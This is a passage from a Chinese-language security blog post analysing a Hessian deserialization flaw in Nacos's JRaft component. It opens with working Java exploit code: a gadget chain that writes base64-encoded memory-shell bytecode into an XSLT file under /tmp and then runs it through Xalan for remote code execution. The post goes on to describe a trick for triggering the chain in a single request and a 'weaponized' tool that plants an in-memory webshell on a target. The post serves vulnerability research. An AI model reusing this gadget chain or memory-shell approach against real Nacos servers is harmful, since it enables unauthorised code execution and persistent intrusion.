select=\&quot;ru:defineClass(&#x27;&lt;class_name&gt;&#x27;,$bs,$cl)\&quot;/&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;      &lt;xsl:value-of select=\&quot;$rce\&quot;/&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;    &lt;/xsl:template&gt;\n&quot;</span> +</span><br><span class="line">            <span class="string">&quot;  &lt;/xsl:stylesheet&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">genClassName</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="type">Random</span> <span class="variable">random</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Random</span>();</span><br><span class="line">        <span class="type">int</span> <span class="variable">length</span> <span class="operator">=</span> random.nextInt(<span class="number">10</span>) + <span class="number">1</span>; <span class="comment">// 随机生成字符串的长度，范围从1到10</span></span><br><span class="line">        <span class="type">StringBuilder</span> <span class="variable">sb</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">StringBuilder</span>(length);</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; length; i++) &#123;</span><br><span class="line">            <span class="type">char</span> <span class="variable">c</span> <span class="operator">=</span> (<span class="type">char</span>) (random.nextInt(<span class="string">&#x27;z&#x27;</span> - <span class="string">&#x27;a&#x27;</span>) + <span class="string">&#x27;a&#x27;</span>); <span class="comment">// 生成随机字符，范围从a到z</span></span><br><span class="line">            sb.append(c);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> sb.toString();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> HashMap&lt;Object, Object&gt; <span class="title function_">makeMap</span><span class="params">(Object v1, Object v2)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        HashMap&lt;Object, Object&gt; s = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        Reflections.setFieldValue(s, <span class="string">&quot;size&quot;</span>, <span class="number">2</span>);</span><br><span class="line">        Class&lt;?&gt; nodeC;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            nodeC = Class.forName(<span class="string">&quot;java.util.HashMap$Node&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (ClassNotFoundException e) &#123;</span><br><span class="line">            nodeC = Class.forName(<span class="string">&quot;java.util.HashMap$Entry&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        Constructor&lt;?&gt; nodeCons = nodeC.getDeclaredConstructor(<span class="type">int</span>.class, Object.class, Object.class, nodeC);</span><br><span class="line">        nodeCons.setAccessible(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">        <span class="type">Object</span> <span class="variable">tbl</span> <span class="operator">=</span> Array.newInstance(nodeC, <span class="number">2</span>);</span><br><span class="line">        Array.set(tbl, <span class="number">0</span>, nodeCons.newInstance(<span class="number">0</span>, v1, v1, <span class="literal">null</span>));</span><br><span class="line">        Array.set(tbl, <span class="number">1</span>, nodeCons.newInstance(<span class="number">0</span>, v2, v2, <span class="literal">null</span>));</span><br><span class="line">        Reflections.setFieldValue(s, <span class="string">&quot;table&quot;</span>, tbl);</span><br><span class="line">        <span class="keyword">return</span> s;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title function_">genPayload</span><span class="params">(String payloadType)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">SwingLazyValue</span> <span class="variable">value</span> <span class="operator">=</span> <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">if</span> (payloadType.equals(<span class="string">&quot;writeFile&quot;</span>)) &#123;</span><br><span class="line">            <span class="type">ClassPool</span> <span class="variable">cp</span> <span class="operator">=</span> ClassPool.getDefault();</span><br><span class="line">            cp.insertClassPath(<span class="keyword">new</span> <span class="title class_">ClassClassPath</span>(MemShell.class));</span><br><span class="line">            <span class="type">CtClass</span> <span class="variable">cc</span> <span class="operator">=</span> cp.get(MemShell.class.getName());</span><br><span class="line">            cc.setName(genClassName());</span><br><span class="line">            <span class="type">byte</span>[] bs = cc.toBytecode();</span><br><span class="line">            <span class="type">String</span> <span class="variable">base64Code</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">sun</span>.misc.BASE64Encoder().encode(bs).replaceAll(<span class="string">&quot;\n&quot;</span>, <span class="string">&quot;&quot;</span>);</span><br><span class="line">            <span class="type">String</span> <span class="variable">xslt</span> <span class="operator">=</span> xsltTemplate.replace(<span class="string">&quot;&lt;base64_payload&gt;&quot;</span>, base64Code).replace(<span class="string">&quot;&lt;class_name&gt;&quot;</span>, cc.getName());</span><br><span class="line">            value = <span class="keyword">new</span> <span class="title class_">SwingLazyValue</span>(<span class="string">&quot;com.sun.org.apache.xml.internal.security.utils.JavaUtils&quot;</span>, <span class="string">&quot;writeBytesToFilename&quot;</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;/tmp/nacos_data_temp&quot;</span>, xslt.getBytes()&#125;);</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (payloadType.equals(<span class="string">&quot;xslt&quot;</span>)) &#123;</span><br><span class="line">            value = <span class="keyword">new</span> <span class="title class_">SwingLazyValue</span>(<span class="string">&quot;com.sun.org.apache.xalan.internal.xslt.Process&quot;</span>, <span class="string">&quot;_main&quot;</span>, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="keyword">new</span> <span class="title class_">String</span>[]&#123;<span class="string">&quot;-XT&quot;</span>, <span class="string">&quot;-XSL&quot;</span>, <span class="string">&quot;file:///tmp/nacos_data_temp&quot;</span>&#125;&#125;);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        <span class="type">UIDefaults</span> <span class="variable">uiDefaults</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">UIDefaults</span>();</span><br><span class="line">        uiDefaults.put(value, value);</span><br><span class="line"></span><br><span class="line">        Hashtable&lt;Object, Object&gt; hashtable = <span class="keyword">new</span> <span class="title class_">Hashtable</span>&lt;&gt;();</span><br><span class="line">        hashtable.put(value, value);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> makeMap(uiDefaults, hashtable);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但这也产生了一个不算问题的问题，即我们需要打两次反序列化才能走完所有的流程。</p>
<h3 id="2-2-一个-Hessian-反序列化技巧"><a href="#2-2-一个-Hessian-反序列化技巧" class="headerlink" title="2.2 一个 Hessian 反序列化技巧"></a>2.2 一个 Hessian 反序列化技巧</h3><p>2.1 中介绍的 XSLT 反序列加载本地文件正常情况下需要发两次包触发两次 Hessian 反序列才能实现代码执行，大哥教了我一个方法可以在一个请求内触发所有的 payload（不依赖于 gadget 本身）：</p>
<p><img src="https://p.ipic.vip/fjn88o.png"></p>
<p>原理是自己修改实现类的代码，把原类从 lib 中删除，自定义的增加几个 Object 类型的属性，在 Server 进行反序列化时也会将这几个属性一块反序列化了，这部分涉及到 Hessian 对字节数组的解析逻辑，不在这篇文章中分析了。</p>
<h3 id="2-3-探明-“真正”-的漏洞影响范围"><a href="#2-3-探明-“真正”-的漏洞影响范围" class="headerlink" title="2.3 探明 “真正” 的漏洞影响范围"></a>2.3 探明 “真正” 的漏洞影响范围</h3><p>网上许多应急文章都有传 Nacos 1.x 也受影响，经过深入分析后发现这可能是一次误判；这里说的误判不代表 Nacos 在 1.x 不存在 Hessian 反序列化的隐患，只是说无法正常利用。</p>
<p>对 1.4.x 进行分析后发现，调用了 SerializeFactory.getDefault()#deserialize 方法的只有 DistributedDatabaseOperateImpl 这一个类，其它的都是利用 Jackson 实现的反序列化。</p>
<p>DistributedDatabaseOperateImpl 对应的 groupId 为 nacos_config，<strong>实测发现我们是无法通过 RPC 调到这个 groupId 对应的 onApply 方法的，因此自然也不存在 Hessian 反序列化漏洞的利用。</strong></p>
<h2 id="0x03-武器化"><a href="#0x03-武器化" class="headerlink" title="0x03 武器化"></a>0x03 武器化</h2><p>我基于上面漏洞利用的原理编写了一个漏洞利用工具，输入 ip、webPort、raftPort、groupId 即可返还给你一个内存马。</p>
<p>完整流程为：通过 web 获取 Nacos 版本并与受影响的版本进行匹配 -&gt; 发起 RPC 请求触发反序列化 -&gt; 遍历线程中马。</p>
<p><img src="https://p.ipic.vip/ehdxik.jpg" alt="image-20230614000906843"></p>
<p>对于不存在漏洞的版本输出提示：</p>
<p><img src="https://p.ipic.vip/bc20nx.jpg" alt="image-20230614004300087"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">0x01 漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">0x02 漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-0-%E6%97%A0%E6%8D%9F%E5%88%A9%E7%94%A8%E5%8E%9F%E7%90%86"><span class="toc-number">3.1.</span> <span class="toc-text">2.0 无损利用原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-%E6%9B%B4%E5%8A%A0%E9%80%9A%E7%94%A8%E7%9A%84-gadget"><span class="toc-number">3.2.</span> <span class="toc-text">2.1 更加通用的 gadget</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-%E4%B8%80%E4%B8%AA-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%8A%80%E5%B7%A7"><span class="toc-number">3.3.</span> <span class="toc-text">2.2 一个 Hessian 反序列化技巧</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-3-%E6%8E%A2%E6%98%8E-%E2%80%9C%E7%9C%9F%E6%AD%A3%E2%80%9D-%E7%9A%84%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D%E8%8C%83%E5%9B%B4"><span class="toc-number">3.4.</span> <span class="toc-text">2.3 探明 “真正” 的漏洞影响范围</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E6%AD%A6%E5%99%A8%E5%8C%96"><span class="toc-number">4.</span> <span class="toc-text">0x03 武器化</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&text=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&is_video=false&description=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Nacos JRaft Hessian 反序列化分析&body=Check out this article: https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&title=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&name=Nacos JRaft Hessian 反序列化分析&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://4ark.me/post/Nacos-JRaft-Hessian-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90.html&t=Nacos JRaft Hessian 反序列化分析"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    p1g3
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
